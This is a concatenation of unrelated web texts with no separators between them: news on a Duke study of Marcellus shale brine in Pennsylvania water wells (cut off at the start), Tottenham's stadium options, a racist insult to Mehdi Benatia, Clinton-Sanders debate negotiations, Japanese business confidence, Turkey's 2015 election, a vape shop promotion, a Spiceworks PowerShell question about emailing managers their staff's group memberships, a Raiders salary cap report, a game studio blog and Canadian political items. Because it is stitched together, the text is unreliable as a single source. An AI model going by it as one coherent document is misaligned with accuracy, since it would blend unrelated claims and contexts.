The Duke team evaluated 426 samples from groundwater aquifers in six counties overlying the Marcellus shale formation in northeastern Pennsylvania.
The small group of homes whose water was sampled by the Duke team may be at higher risk of contamination due to underlying geology, said Nathaniel Warner, a PhD student at Duke who served as lead author of the study.
"By identifying the geochemical fingerprint of Marcellus brine, we can now more easily identify where these locations and who these homeowners might be," said Warner.
The new findings also should help address concerns about barium contamination in local drinking water, Warner noted, especially in valleys in the region, where elevated salinity is associated with barium contamination in the water.
"Our study's findings suggest that homeowners living in these areas are at higher risk of contamination from metals such as barium and strontium," said Warner.
The Marcellus shale formation is located about a mile underground and contains highly saline water that is naturally enriched with salts, metals and radioactive elements.
The study appears this week in the online early edition of the Proceedings of the National Academy of Sciences, and was funded by Duke's Nicholas School of the Environment.
Tweet Emails: Separate multiple email addresses with semi-colon Your Email: Send email to me as well Subject: Comments: 200-character limit.
WHAT DO YOU THINK?
Generated by readers, the comments included herein do not reflect the views and opinions of Rigzone. All comments are subject to editorial review. Off-topic, inappropriate or insulting comments will be removed.
Tottenham Hotspur will have to spend a season away from White Hart Lane. The club confirmed as much on Tuesday, ending years of speculation about whether they could play in their venerable old home while their new stadium is being built or if they would have to find a new place for a season.
It's unfortunate that Spurs will have to leave for a year, but it was, in a lot of ways, unavoidable. The first stadium plan would have seen them build three-quarters of the new stadium, move into it and play a season in the partially completed stadium, and then have a fully completed new building after White Hart Lane was torn down, but that idea hasn't been tossed about in years. The club rarely brought it up and, as the new stadium was delayed further, it became clear that Spurs' priority would be to build the venue as quickly as possible, which meant a year away from home.
And that brings us to the next question: where will Spurs play in 2017-18 (or whatever the season is before they finally move into their new ground)?
These appear to be the most likely options:
The Olympic Stadium
There was a time when the Olympic Stadium was a very real -- and frightening -- candidate to be Spurs' new, permanent home. Daniel Levy was bidding against West Ham for a lease to the stadium, which would have seen Tottenham leave North London for East London. As you can imagine, few Spurs supporters were happy with this plan.
Eventually, Levy backed off of the Olympic Stadium and West Ham won a 99-year lease to the venue, which they will move into for the 2016-17 season. By then, it will have seen the lower bowl reconfigured from its current track and field setup to one more conducive to football and its capacity will be reduced to 54,000.
All in all, the Olympic Stadium would make for a pretty ideal home for Tottenham. It's not in North London, but the only option there is the Emirates so we're going to ignore than on principle. The Olympic Stadium is relatively close, it's in London, it is modern and it will do just fine.
Of course, there is the West Ham problem. Spurs would have to agree to a rent deal with West Ham and the London Legacy Development Corporation. While that can certainly be done, there is no way the Hammers let Tottenham rent the ground on the cheap -- not to mention concession and sponsorship split, as well as everything else that goes along with a stadium deal -- and it is unclear whether the financials of the Olympic Stadium will work out for Spurs as a result.
Wembley Stadium
Wembley offers Spurs roughly the same proximity advantages of the Olympic Stadium. Again, it's not North London, but North London is off of the table. Wembley, like the Olympic Stadium, is also a modern ground with every amenity that Spurs could want.
Of course, Wembley also also presents Spurs with the same issue as the Olympic Stadium: money. Renting out Wembley is hardly cheap, and the FA has sold a lot of long-term packages to people and corporations, guaranteeing them tickets to every event at the venue, or at least first chance to buy tickets. How would Spurs reconcile that and would it make sense financially? Toss in that the stadium has a pitch disliked by almost every player, there are a lot of events to schedule around and that it holds 90,000 people, meaning Tottenham would be looking at swaths of empty seats, and there are a lot of downsides to Wembley.
But a stadium in London that they won't have to share with any other Premier League team? There is a lot of value in that, albeit value that doesn't show up on the bottom line.
Stadium mk
The home of MK Dons is being expanded for the Rugby World Cup and, by this summer, will hold 32,000 fans. That seems low, but it is only roughly 4,000 fewer seats than White Hart Lane. It will also be much cheaper to rent out than pretty much any other option Spurs have, which will certainly please Levy.
But Milton Keynes is not in North London. It is not even in London, period. It is 50 miles away from White Hart Lane, which makes it both inaccessible for many Tottenham fans, but expensive as well. Whether by car or train, Spurs supporters would be looking at paying a pretty penny to spend at least an hour commuting to a match, each way. And if that sounds bad on a Saturday afternoon, imagine doing so midweek. Spurs probably wouldn't have to worry about losing 4,000 seats from their capacity because they would be hard-pressed to fill 32,000 weeks in, week out.
As much of a non-starter as Stadium mk sounds from a location and accessibility standpoint, it still has the most important thing going for it: cost. It will be cheap and Levy loves cheap.
Twickenham
Seemingly the longest of long shots, Twickenham does have its fair share of open dates and is in relatively accessible West London, but it is a large stadium (82,000) that will not come cheap and is owned by the Rugby Football Union, who have no vested interest in helping out football, let alone a football club.
The most likely scenario
Ideally, Spurs would be able to play at the Olympic Stadium or Wembley at a reasonable price. That would allow them to be decently close to North London in a modern stadium that befits a Premier League club. But that may not happen, and it's tough to see Twickenham working. Any other London ground is unlikely -- the Emirates and Stamford Bridge are off the board, while Craven Cottage, Selhurst Park and Loftus Road are too small without enough earning potential to justify the headache -- which means Stadium mk is it.
As horrible as that sounds, Stadium mk makes the most sense, considering the costs and Spurs' chairman, but there would be a way that makes it a little better. Tottenham could split home grounds for the season, playing their fair share of matches at Stadium mk, but hosting London derbies or matches against fellow top seven clubs at the Olympic Stadium or Wembley. Those matches will likely draw enough to justify the costs, and allow for a more accessible home, at least some of the time.
Playing away from White Hart Lane is going to be terrible, even if only for a reason. But Spurs are not in a position to compete with the top five right now -- just look at the wage bills -- and a new stadium goes a long way to rectifying that. In the long-term, Tottenham are doing the right thing, even if it will make for a season from hell. But maybe they'll finish top four that season as a reward for the supporters' inconvenience? We can hope.
Italian football has been hit by another race storm after on-loan Juventus defender Mehdi Benatia was called a 's***** Moroccan' live on television.
The centre back was giving an interview to Italian broadcasters Rai after Saturday's 1-1 draw against Torino before he heard a technician's voice in his earpiece asking: 'What are you saying, s***** Moroccan?'
The insult was not broadcast but Benatia stopped mid-sentence and asked: 'Who said that in the background? I heard someone talking in the background. Who said that? I heard an insult.'
Scroll down for video
Juventus defender Mehdi Benatia was called a 's***** Moroccan' live on Italian TV
The 30-year-old is on loan at Juventus from Bayern Munich this season
The Rai presenter then cut short the interview because of 'technical difficulties.'
A Juventus press officer said that Benatia had heard a racist insult concerning his nationality.
The broadcaster later issued an apology for the 'deplorable incident'.
'Rai is sincerely sorry for the deplorable incident of racism that involved the Juventus player Benatia during our Calcio Champagne program and that fortunately was not heard by the viewers, as it did not go on air,' the national broadcaster said in a statement.
Benatia heard the insult in his ear but it was not broadcast on television
The interview was cut short by the broadcaster as Benatia asked who had insulted him
'Rai has put into motion all attempts to identify who was responsible for what happened and at the moment technical analysis excludes that the unacceptable phrases were uttered by a dependent of our company.
'The investigation nevertheless continues but considering the gravity of what happened Rai meanwhile offers our complete and total solidarity to the player and his club,' the statement added.
It comes in the wake of former Portsmouth and Inter Milan midfielder Sulley Muntari receiving a one-game ban - then overturned - after he walked off the pitch last weekend having been booked for complaining to the referee about racist abuse in the crowd.
(Reuters) - Hillary Clinton agreed on Thursday to some of the terms laid down by an opponent, Senator Bernie Sanders, in his call to increase the number of public debates as they vie to become the Democratic candidate in November's U.S. presidential election.
U.S. Democratic presidential candidate Hillary Clinton speaks at a campaign stop at the Family Fun Center in Adel, Iowa January 27, 2016. REUTERS/Brian Snyder . SAP is the sponsor of this coverage which is independently produced by the staff of Reuters News Agency.
Clinton's two main Democratic challengers, Sanders and former Maryland Governor Martin O'Malley, have long called for more debates. They have complained that the relatively skimpy schedule of only six encounters was designed by the party to protect Clinton's position at the top of opinion polls.
But the call for more debates intensified this week after a hastily arranged debate next Thursday in New Hampshire was announced, organized by a news channel and a state newspaper. Both Clinton and O'Malley said they would attend if all the candidates agreed, despite risking the ire of the Democratic National Committee, which has forbidden candidates from taking part in unsanctioned encounters.
On Wednesday evening, the Sanders campaign called for three more debates, in March, April and May. The campaign also stipulated that none be held on a Friday, Saturday or holiday weekend, when the number of potential viewers typically dips.
If Clinton committed to this, his campaign said, then Sanders would also agree to join Clinton and O'Malley at the Feb. 4 debate convened by MSNBC and the New Hampshire Union Leader newspaper, just days before the state becomes the second in the country to vote for Republican and Democratic presidential candidates.
“Senator Sanders is happy to have more debates, but we are not going to schedule them on an ad hoc basis at the whim of the Clinton campaign,” Sanders' campaign manager, Jeff Weaver, said in a statement. Weaver said Clinton had only agreed to next week's debate because Sanders has been gaining on her in polls.
The response from the Clinton camp on Thursday acceded to some of these conditions, saying it would discuss adding debates only in April and May.
“We have always been willing to add additional debates beyond the six that had been scheduled and look forward to starting discussions on scheduling debates in April and May,” Clinton spokesman Brian Fallon said in an email to reporters.
Spokesmen for Clinton and Sanders did not respond to emails asking if the two campaigns were now in agreement.
It remains unclear if any additional debates will come to pass. The Democratic National Committee has said it will not sanction the debate organized for next week, though it seems unlikely it will ban all three candidates from the remaining two sanctioned debates.
(Reporting by Jonathan Allen; Editing by Jonathan Oatis)
SAP is the sponsor of this coverage which is independently produced by the staff of Reuters News Agency.
Confidence among Japanese businesses fell at its fastest rate for more than three decades in the last quarter, figures out today showed, as the country's top banker warned that the economy could continue to shrink for at least another year.
In its quarterly "tankan" survey, the Bank of Japan [BoJ] said the confidence index among major manufacturers had plummeted from -3 to -24 in the three months to December, its biggest drop since February 1975.
The sharp rise of the yen and the global financial crisis have pummelled Japanese car and electronics makers, dragging confidence levels to their lowest since the dog days of early 2002, when it stood at -38.
The survey asked more than 10,000 businesses whether they view the economic climate in a favourable or gloomy light – a negative reading indicates that pessimists outnumber optimists.
The financial crisis has forced Japan's manufacturers to revise earnings forecasts, slash jobs and lower production. Last week Sony said it would cut 8,000 jobs worldwide, while Toyota estimates its net profit for this year will be a mere third of last year's earnings.
The strength of the yen, which reached a 13-year-high against the dollar last Friday, could force exporters to cut more jobs and reduce capital spending and output even further, analysts warned.
Opinions are divided over the central bank's response when its policy board meets later this week. While there is speculation it will cut interest rates to encourage borrowing and investment, the consensus is that rates will stay at 0.3% until around March next year.
Instead, the central bank may opt to pump more liquidity into the financial system to encourage lending, Takuji Okubo, an economist at Merrill Lynch, told the Associated Press.
"As interest rates get close to zero, there is really no incentive for people to trade in the money market," he said. "That's why the BoJ wants to keep at least some interest, to keep people trading."
The tankan results are further proof that Japan's recession is far worse than previously feared. The world's second biggest economy has contracted for two straight quarters, with some fearing that the slowdown could continue into the first quarter of next year. That would mark the first time the economy has declined for four straight quarters since the end of the war.
Last week the prime minister, Taro Aso, responded with a stimulus package worth ¥23 trillion (£169bn) in an attempt, he said, to drag Japan out of a financial maelstrom felt "only once every hundred years".
But in a newspaper interview published today, the BoJ governor, Masaaki Shirakawa, warned that the economy could continue to shrink for at least another year through to the end of March 2010. The bank had originally forecast modest growth for the next fiscal year.
The stockmarket offered only light relief for exporters. The Nikkei benchmark index gained just over 5%today, buoyed by speculation that George Bush will use part of a $700bn federal bail-out package to rescue struggling US carmakers.
Get the biggest football stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
All this talk of horses is causing a bit of a 'mare for everyone, and we're struggling to keep up with Jose Mourinho's horse comparisons, so we've made things easier.
For the first time in football history, all in one place, we have the equestrian guide to Premier League football.
Never again will you have to wonder which type of horse your team is, and never again will you have to look it up on Google to see if your team is a complete and utter donkey.
So, get yourself on a stable seat, have a read of this article which has been a furlong time coming, and enjoy it because it was neighed bother for us to write.
Here's the equestrian encyclopedia of Premier League football:
1) Liverpool are dark horses:
2) Chelsea are little horses:
(Image: Tim Stewart)
3) Manchester City are big horses:
(Image: Getty)
4) Arsenal are falling at the final hurdle:
(Image: Getty)
5) Manchester United are donkeys:
6) Newcastle's horse is being rocked:
(Image: Caters)
7) For legal reasons we can't tell you which club are managed by a cowboy:
(Image: Getty Images)
8) Cardiff City's horse came at a Price:
(Image: WENN)
9) Sunderland's horses are safer these days:
10) Spurs have gone from panto horses to unlikely title contenders:
(Image: TMS)
11) And Swansea's horse has well and truly bolted:
12) Hull City owner Assem Allam holds his little pony in a tight grip:
(Image: Splash)
13) Crystal Palace's horse has its mojo back:
14) And then we ran out of pictures of horses...
Supporters of the Peoples' Democratic Party, Diyarbakir, Turkey | Sedat Suna/EPA Forum 5 takeaways from the Turkish election Erdoğan gets a reality check from a nation sick of autocracy.
ISTANBUL — Turkey voted on Sunday. The results are eye-catching, and certainly worth parsing for a world that awaits explanation. Here are five quick conclusions for a wide audience.
After 12 years in power, the tide has turned against Erdoğan
President Recep Tayyip Erdoğan's apparently unstoppable rise hit a democratic bumper in Turkey's parliamentary elections on Sunday, despite his presiding over 12 mostly boom years at the top of Turkey's political system and the fact that his party won more than 40 percent of the vote.
Erdoğan began the election season by setting his followers a goal of winning 400 of parliament's 550 seats for the Justice and Development Party (AKP). The idea was to change the constitution and legitimize the executive powers he is already using in practice. Even on election night, his stalwart advisor Yiğit Bulut was still in denial about AKP's setback, insisting that “this result means one thing: an executive presidency.”
This is now most unlikely to happen. What happened to Erdoğan, one of Turkey's luckiest, canniest and most charismatic politicians?
For sure, Turks have become tired of a creeping authoritarianism, a narrowing space for opposition, tightening state control of the judiciary, policy mistakes in Syria and the Middle East, and an extravagant 1,150-room presidential palace.
But the most bitter paradox for Erdoğan is that it may have been precisely his personal engagement to clinch a supremely powerful executive presidency that backfired, leaving AKP as the largest single party, but without a parliamentary majority or an obvious coalition partner.
Casting aside the traditionally neutral role of Turkey's president — a five-year position he has held for less than a year — Erdoğan stepped in to spearhead his old party's campaign, haranguing vast crowds about ‘we' (the ruling party) against ‘them'. Using sometimes vitriolic language, he claimed all the other parties had “formed gangs” against AKP, and were siding with foreign “conspirators” and “terrorists.”
The result: The anti-Erdoğan camp indeed reacted against his attempt to consolidate power. Enough of them persuaded their friends to vote for a small Kurdish nationalist party that for once topped Turkey's 10 per cent threshold of the national vote to get into parliament on its own account.
This swing of about five percent against AKP completely upset nearly 13 years of Turkish parliamentary arithmetic. Whatever happens next, Erdoğan has lost his old ability to control the government and possibly even his party from his presidential post.
Democracy works, even for Kurds
It helped that the leader of the Kurdish nationalist Peoples' Democracy Party (HDP), Selahattin Demirtaş, ran a superb campaign, resulting in his party receiving 13 percent of the vote.
Demirtaş had all the right lines, even when a bomb killed two people and injured 100 just before his last big rally, calming supporters by saying “we must give the answer at the ballot box.” With youthful good looks and an easy manner, he appealed to Turkish progressives by vowing to seek peace to end Turkey's three-decade-old Kurdistan Workers Party (PKK) insurgency, choosing Turkey's first openly gay candidate, fielding far more women candidates than many European political parties, and even accepting as genocide the destruction of the Armenians of Anatolia in 1915. Erdoğan derided him as a “pop star.”
HDP will have to work hard to keep this high non-Kurdish share of the vote, but already the climate is more conducive to reconciliation between Turks and Kurds. As one Istanbullu commented: “We used to look down on Turkish spoken with a Kurdish accent as being the language of peasants. Now it's cool.”
The result may well help efforts to end Turkey's PKK insurgency
If Demirtaş and HDP had not reached the 10 percent threshold, its disappointed MP candidates might have gone to Diyarbakir and declared an autonomous parliament. This would have fed into polarization between Turks and Kurds, and empowered hardliners in the PKK insurgency.
But now that HDP has won a place in Ankara as a political party and not as a group of independents, there is a clear, legitimate, Kurdish counterpart for solving the Kurdish problem in Turkey. Whatever platform is chosen for the discussion — parliament, a constitutional convention, a group of wise persons — it will need to address long-standing Kurdish concerns about mother-tongue education, a non-discriminatory constitution, decentralisation, a fairer anti-terrorism law, and a lowering of the ten percent election threshold.
Without such political advances there will be little chance of persuading the PKK to disarm in Turkey, or of turning a ceasefire in place since 2013 into a long-lasting peace settlement.
This is by no means the end of the road in a conflict that has killed more than 30,000 people since 1984. HDP may now have become empowered as an interlocutor, but it has lost its all-powerful partner in Erdoğan. Bombings and attacks on the HDP during the election campaign are a reminder that violence is always close to the surface.
Also on POLITICO: The president and the protégé:http://politi.co/1dq2Bhm.
Politics are going to be uncertain in Turkey for a while
Turkish television stations lit up with debate as the extent of Erdoğan's problems became clear, throwing off recent years of caution during which a wrong word could bring a phone call from Ankara that could cost a journalist his or her job.
Some commentators thought the AKP would push for another election in the hope of winning back their lost ground. But the newly empowered parliament would have to vote for that, which seems unlikely. A minority AKP government supported from the outside by another party also would not be sustainable, and seems unlikely.
AKP leaders sent mixed messages about whether or not they might go into coalition with any of the other main parties. The next biggest party, the secularist Republican People's Party (CHP), with 130 seats, might be too ideologically opposed to the pro-Islamic AKP. The right-wing Nationalist People's Party (MHP), with 81 seats, is more likely to join AKP. Demirtaş, on behalf of HDP, with 79 seats, ruled out the possibility.
If none of these pans out, it is possible that the three opposition parties — CHP, MHP and HDP — will get together.
Turkey is not going back to the bad old days of the 1970s or 1990s
Long-faced AKP supporters gloomily started recalling the bad old days of coalition governments in the 1970s and 1990s that led to runaway inflation and bloody domestic conflicts. They believed that Turkey would miss the political stability and almost uninterrupted economic growth it has known under Erdoğan's rule, and the mega infrastructure projects of his “New Turkey” that built new roads, railways and airports all over the country.
But the fact is that the economy had already started slowing, and has long been seen as a bubble waiting to burst. Whoever won was going to have trouble. And part of AKP's fear may be that long-suppressed corruption cases may now come back on the agenda.
At the same time, Turkey once again demonstrated a key difference with its Middle Eastern and Eurasian neighbors: its elections were once again well run, its results accepted, and participation high. It was long clear that a small number of votes could swing this election, fueling suspicion among AKP critics that the ruling party would try to increase its share of votes with election fraud. While news of small irregularities circulated on social media, the government deserves credit for the conduct of elections and the acceptance of results — but so does civil society, which staged an unprecedented effort to monitor the polling stations.
And things may not be so bad as Turkey finds a new normal. Turkish society is now more mature, compromising and accepting than in previous eras that were ended by military coups or plagued by ideological intolerance. Pluralism is now appreciated as necessary, a fundamental change of which the AKP, in its early years, was an integral part.
Ironically, it was also Erdoğan's increasing intolerance of dissent, epitomized in the crushing of the Gezi protests in Istanbul in May-June 2013, that created a sense of solidarity between many normally fractious factions of Turkish society — nationalists, Islamists, Kurds, secularists, and liberals — that set the stage for much of the activism that persuaded Turks to vote against him on Sunday.
Nigar Göksel is the Turkey senior analyst for the International Crisis Group, an independent conflict prevention organization. Hugh Pope, whose books include "Turkey Unveiled" (Overlook, 2011) and "Sons of the Conquerors: The rise of the Turkic world" (Overlook, 2006), is the ICG's director of communications & outreach.
Happy New Year Vape Fans! After an amazing year in 2014, we are excited to share our 2015 resolution with you!
We all know that with every new year comes reflection, confirmation of personal goals, and resolutions to obtain those goals. As a company we found there are really two things that we truly want to accomplish for our vaping community. First, we want to make vaping more accessible to everyone (of legal age of course) who wants to transition from smoking to vaping, regardless of their income. Second, we want to show our appreciation to all of you that have supported us, allowing us to grow into the company we are today. So, we have reduced our prices throughout our site! From e-juice (updated prices shown below) to accessories and hardware, we have reduced prices across the board!!
Now, I'm sure there are some of you who are wondering if we reduced our quality level in order to make a difference in the pricing. The answer: NO. We are still providing the high quality e-juice and hardware you have come to appreciate and expect and will continue to do so! Vaping is our passion, and this is our community, these changes are simply to make our passion financially accessible to everyone within the community as well as those interested in making the switch from smoking.
As the saying goes, But wait, there's MORE……
We have 5 new flavors for your vaping pleasure in our Winter flavor release!
Slim Mints E-juice: The perfect balance of flavors, combining the taste of rich chocolate cookies with undertones of delicious creamy mint filling, making this flavor a refreshing yet decadent treat.
Firecider E-Juice: Pull on your comfy sweater, sit next to your freshly lit fire, and enjoy a spiced apple cider vape that will make any chilly day a comfy, cozy, and relaxing one. Firecider tastes just like farm fresh apple cider with a hint of cinnamon.
Arctic Heat E-Juice: A deliciously balanced vape, with an invigorating blend of spicy cinnamon and cool menthol, creating a refreshing mixture of hot and cold.
French Toast E-juice: This really packs in the flavor! With the delicious combination of sweet battered bread, rich cinnamon spice, and fresh maple syrup, get ready to prepare your mouth for an explosion of flavor!
Happy Rancher E-juice: Reminiscent of a familiar tart, and slightly sour, berry candy that will remind you of a simpler time.
Well vape fans, there you have it, reduced prices and new flavors to love! We are honored to be a part of your vaping journey and look forward to another great year in 2015. Let us know in the comments below what are you looking forward to or hoping to see from us in the coming year?
Vape on!
Track users' IT needs, easily, and with only the features you need.
Get answers from your peers along with millions of IT pros who visit Spiceworks.
Hello all,
A few days back i created a powershell topic because i needed a script to create a csv file for each manager and the csv file needed to contain the list of direct reports to him and the list of AD group that user was in. Then send the csv file as an email attachment to the corresponding manager.
But now id like to contain not only the result as an attachment in the csv but also in the body of the email contain the result like the following.
Powershell Import-Module ActiveDirectory # Head $a = "<style>" $a = $a + "BODY{font-family:Arial;background-color:#fff;width: 100%}" $a = $a + "TABLE{font-family:Arial;width: 90%; border-collapse: collapse;background-color:#59a9ff;}" $a = $a + "TH{background-color: #59a9ff; color: white;height: 35px;}" $a = $a + "TD{display: table-cell;height: 25px;vertical-align: inherit;border-bottom: 1px solid #ddd;}" $a = $a + "P{font-family:Arial;position: absolute;}" $a = $a + "</style>" $managers = Get-ADUser -Filter * -Properties Name , DirectReports , EmailAddress | where { $_ . directreports -ne $Null } foreach ( $manager in $managers ) { $managername = $manager . Name $manageremail = $manager . UserPrincipalName $dreports = $manager . directreports $today = ( Get-Date ). ToString () $body = "<center><p>Report Date $today.</p></center>" $body += "<p><b>$managername</b>,</p> " foreach ( $dr in $dreports ) { $user = get-aduser $dr -properties * $members = $user . memberof -replace '^CN=(.+?),(?:OU|CN)=.+' , '$1' | %{ New-Object PSObject -Property @{ 'Group Membership' = $_ }} | convertTo-html -Head $a -Body "<H4>Group Membership.</H4>" $dreport = $dr -replace '^CN=(.+?),(?:OU|CN)=.+' , '$1' $body += " `n " $body += "<br />" $body += "<center>" $body += "<p>Direct Report: <u>$dreport</u></p>" $body += $members $body += "</center>" } Send-MailMessage -From from @domain . com -To $manager . UserPrincipalName -Subject "Managers - User Entitlements" -Body $body -SmtpServer smtp . server . domain . com -Port 25 -BodyAsHtml }
Q. Any idea, to combine this two and have the script send the email to each manager showing the HTML content of the result but also as an attachment.
Thank you all and any comment or help is gladly appreciate it.
My original post: https://community.spiceworks.com/topic/1984701-user-entitlements?page=1#entry-6813427
Edited May 13, 2017 at 18:56 UTC
The Raiders are still recovering from the salary cap purge of 2013 when they gutted their entire roster of bloated contracts and essentially started over. That has helped them collect a great deal of cap space, but the results are still underwhelming. Surprisingly, the Raiders did not aggressively target the biggest name players in free agency, instead looking at the more blue-collar types like center Rodney Hudson ($8.9M) and defensive tackle Dan Williams ($6.25M). Their approach has left them near the bottom of the NFL in cap allocation, ranking 29th in spending on the top-five players and 30th in spending on their top-10 players.
In a team-by-team salary cap space breakdown heading into the 2015 season, we look at what teams have spent, what they have left and the decisions they'll face in the near future. No franchise can ignore its bottom line and still expect to win, no matter how good the play-calling.
PHOTOS: Raiders' worst first-round picks | Carr may need surgery | Giants salary cap report
Oakland Raiders 2015 salary cap space
Financial Summary
Salary Cap Space: $19.9 million
Largest Cap Charge: Rodney Hudson, $13 million
Best Value: Roy Helu, $2.1 million
Worst Value: Dan Williams, $8 million
Percentage of Cap Spent on Top 5 Players: 27.0%
Percentage of Cap Spent on Dead Money: 6.1%
Offseason Moves:
Key Additions: C Rodney Hudson, DT Dan Williams, WR Michael Crabtree, RB Trent Richardson, LB Curtis Lofton, S Nate Allen, LB Malcolm Smith, TE Lee Smith, RB Roy Helu
Key Losses: DT Antonio Smith, RB Darren McFadden, C Stefan Wisniewski, CB Tarrell Brown, WR James Jones, DT Pat Sims, S Tyvon Branch
Draft Picks: WR Amari Cooper, DE Mario Edwards, TE Clive Walford, G Jon Feliciano, LB Ben Heeney, LB Neiron Ball, LB Max Valles, T Anthony Morris, WR Andre Debose
Spending Habits
The Raiders' approach has caused their front office to come under a great deal of scrutiny. Last season the team signed a number of older veterans and low-cost players who drew minimal interest around the NFL. The season played out like a retirement tour and many of the names — including Lamarr Woodley, James Jones, Maurice Jones-Drew, Matt Schaub, Antonio Smith, Tarell Brown, and Carlos Rogers — are gone. It was almost a groundhog day scenario this offseason, signing players like Curtis Lofton, Trent Richardson, Nate Allen, Malcolm Smith, and Christian Ponder to what look to be short-term, somewhat overpriced contracts. With the continuing turnover and short-term contractual approach employed by general manger Reggie McKenzie, it should be no surprise that the team's top four salary cap charges will all be attributed to new players in 2015, a trend that should continue in 2016.
Oakland has a fixed model for its contracts, which rarely includes using signing bonus money, to better ensure cap and cash flexibility in the event a player fails to do well. The downside to this manner of negotiating is often having to overpay players in order to have them accept those terms. For Oakland, it has led to a pieced together, year-by-year roster while hoping draft picks develop.
Looking Ahead
The Raiders will have up to 16 unrestricted free agents in 2016, but it is unlikely any of them would be signed over the summer to an extension. The most likely candidate is receiver Rod Streater, who is playing the year on $2.356 million restricted free agent contract. But with the addition of Michael Crabtree and Amari Cooper, the team may just wait to see how everyone looks before making any long-term commitments.
Though it is difficult for fans to accept, it seems as if all planning has been geared to the 2016 offseason. If QB Derek Carr and LB Khalil Mack lead the Raiders to a respectable season in 2015, McKenzie will likely see the time being right to spend on high-quality players in free agency to improve the talent around a core of young stars the team found on draft weekend.
If Oakland struggles again this year, expect the team to make a change at general manager. McKenzie's future may be tied to the performance of Carr. McKenzie's track record with the quarterback position is poor, trading away Carson Palmer for refusing to take a pay cut and selecting Matt Flynn and Schaub as replacements. Most felt McKenzie reached for cornerback D.J. Hayden in the 2013 draft and the GM has already worked with multiple head coaches during his tenure. With the resources in place to dramatically overhaul the roster in 2016, his job security may be the biggest story of the season for the Raiders.
Jason Fitzgerald is an NFL salary expert and contributor for Sporting News. Read more of his writing at OverTheCap.com and follow him on Twitter: @Jason_OTC.
News 20 Jan 2017
Hello everyone and welcome to the blog post for January 20th, 2017!
We have had no releases this week, except to remove the holiday themes in BTD5 and Battles. Our development teams are working on more updates, including changes to clans and tournaments (including player accessible customization!) and a whole heap of balance changes for BTD Battles soon after that. New BSM2 and BTD5 mobile content is also being prepared and the Tower Keepers team are squishing those last bugs for the global launch... we hope to have a release candidate late next week ready for mid February launch with global domination following, naturally.
We're also nearly ready to announce one or two other games that we've been working on that are sure to get some of you talking. We're having many important discussions about how to show these and what sort of info works best.
Ninja Kiwi SAS4 Weapon Competition:
This week's competition is to draw a unique weapon of your own design. Draw it by hand or on your computer and upload the image to an image hosting site, link the picture in a comment below with a short description as well as what prize you want.
That prize? Albert Einstein Your choice of premium weapon in SAS4!
One entry per person
Entries close midday, Friday 27th January (NZ time)
SAS4 is a bit awkward with gifting premium weapons, so your patience is appreciated if it's not added right away, I'll make sure it happens! :)
If you want a title change for the forums, include that in your entry post.
Questions from the Comments:
Will there be a Battle Panic 2?
It's not something I see happening unfortunately. There aren't any plans for it and we have a slew of other ideas about new and returning IP that we're more likely to explore.
In Bloons Monkey City web, Does the attacker have any extra penalties or lose more honor if their attack is successfully defended in Hardcore Mode?
Nope! However it did apply to the attacker when the update first went out. This has been changed now.
Could you ask the SAS4 dev team what kept them from releasing the Sadeye?
It wasn't finished :(
BAILLIEU government MP Geoff Shaw is under police investigation over allegations of misconduct in public office.
The Victoria Police investigation follows an opposition complaint made about Mr Shaw. The complaint came in the wake of a damning Ombudsman's report in October into the Frankston MP's conduct.
Baillieu government MP Geoff Shaw. Credit:Pat Scala
Victorian Ombudsman George Brouwer found Mr Shaw had used his taxpayer-funded Ford Territory and fuel card to run his hardware business, and had provided misleading information about it under oath.
A police spokeswoman on Friday confirmed there was now an investigation under way. She said: ''Victoria Police can confirm that the crime command is investigating allegations of misconduct in public office by a serving member of the Victorian Parliament and the investigation is ongoing.''
The investigation comes as a result of a complaint from opposition scrutiny of government spokesman Martin Pakula. He made the complaint about Mr Shaw in October to police Chief Commissioner Ken Lay. He said the opposition had maintained from day one that investigating Mr Shaw's conduct was a police matter rather than the government's own parliamentary committee.
''It seems the police agree. Ted Baillieu should have sent Geoff Shaw packing from the Parliamentary Liberal Party weeks ago, and he should do so now without further delay,'' Mr Pakula said.
No charges have been laid.
Is it an Imelda Marcos-scale story of entitlement and narcissism? Ah, no. Will it even register next to the oh-so-Canadian tut-tutting in the 1980s over Mila Mulroney's spending, which once included $2,000 for flowers at a lunch, or the furor over Pierre Trudeau's $275,000 indoor lap pool at 24 Sussex?
Not hardly. But the story of Prime Minister Justin Trudeau's taxpayer-employed nannies, reported Tuesday by the CBC's Chris Hall, is one to watch all the same. The reason is the optics, which are lousy — even for, or perhaps especially for, a leader enjoying a protracted honeymoon.
Let us first dispense with the notion that the employment of childcare workers by a prime minister and his spouse, particularly when the children are little, is in any way improper. Every prime minister with a young family in living memory has had such help. The job is 24/7, the demands incessant, the travel constant. In most public circumstances, both the PM and his wife are expected to attend, as Trudeau and Sophie Grégoire-Trudeau have done on their recent international swing. There would be harrumphing if this were not the case.
Likewise, it fails the test of logic to say nannies are less important to a prime minister's proper functioning than are cooks, gardeners or drivers. The taxpayer-employed chef at 24 Sussex Drive (once the Trudeaus move back into the official residence, after renovations) presumably will be deemed a reasonable expense because the PM and his spouse can't very well be leaping up during state dinners to clear the soup bowls, or grab the kettle before it boils over. The PM is not expected to mow his own lawn or rake his own leaves.
Indeed, according to reporting by the
Ottawa Citizen's Don Butler in 2014, caring for then-prime minister Stephen Harper's yard had cost the National Capital Commission a tidy $57,000 since 2009. Ditto the residence's famous indoor pool — $58,500 on maintenance, cleaning and repairs in 2009-14. Even Harper's piano was a burden to taxpayers: Its tuning and care cost nearly $600 over that five-year span. Harper reportedly has a keen ear. With a set of pliers and a tuning fork he likely could have kept the piano sounding true. Maybe he had other things in hand at the time.
Surely the same reasonable standard should apply to changing a diaper. When my children were babies, I used to change them on the fly, on the carpet in the living room, during dinner parties. That would not be deemed entirely proper, one suspects, for a head of government or his spouse, while toasting another head of government, or the Queen and Prince Philip say, over crème brûlée.
That said, Trudeau and his advisers would be smart to pay attention to the public reaction to this story, and not just from the redder-than-red Liberal trolls who flood onto social media, hackles raised and teeth bared, at the first criticism of their champion. Justin Trudeau's party won 39.5 per cent of the popular vote Oct. 19. That means six of every 10 eligible voters chose another party with another leader. The 184 Liberal seats, a commanding majority, are partly the result of a winner-take-all, first-past-the-post electoral system, which Trudeau has promised to abolish, this term. His 184 seats are overwhelmingly urban.
There's a great big chunk of country out there, in other words, that is not gleefully embracing the Liberal restoration, or its smug-sounding slogan that “Canada is back,” as though it ever went away. For those voters, and indeed even for many disaffected conservatives and Red Tories who did vote for the Grits, it will not be obvious that Liberalism is synonymous with Canada, or that the world has been transformed by Trudeau's good intentions.
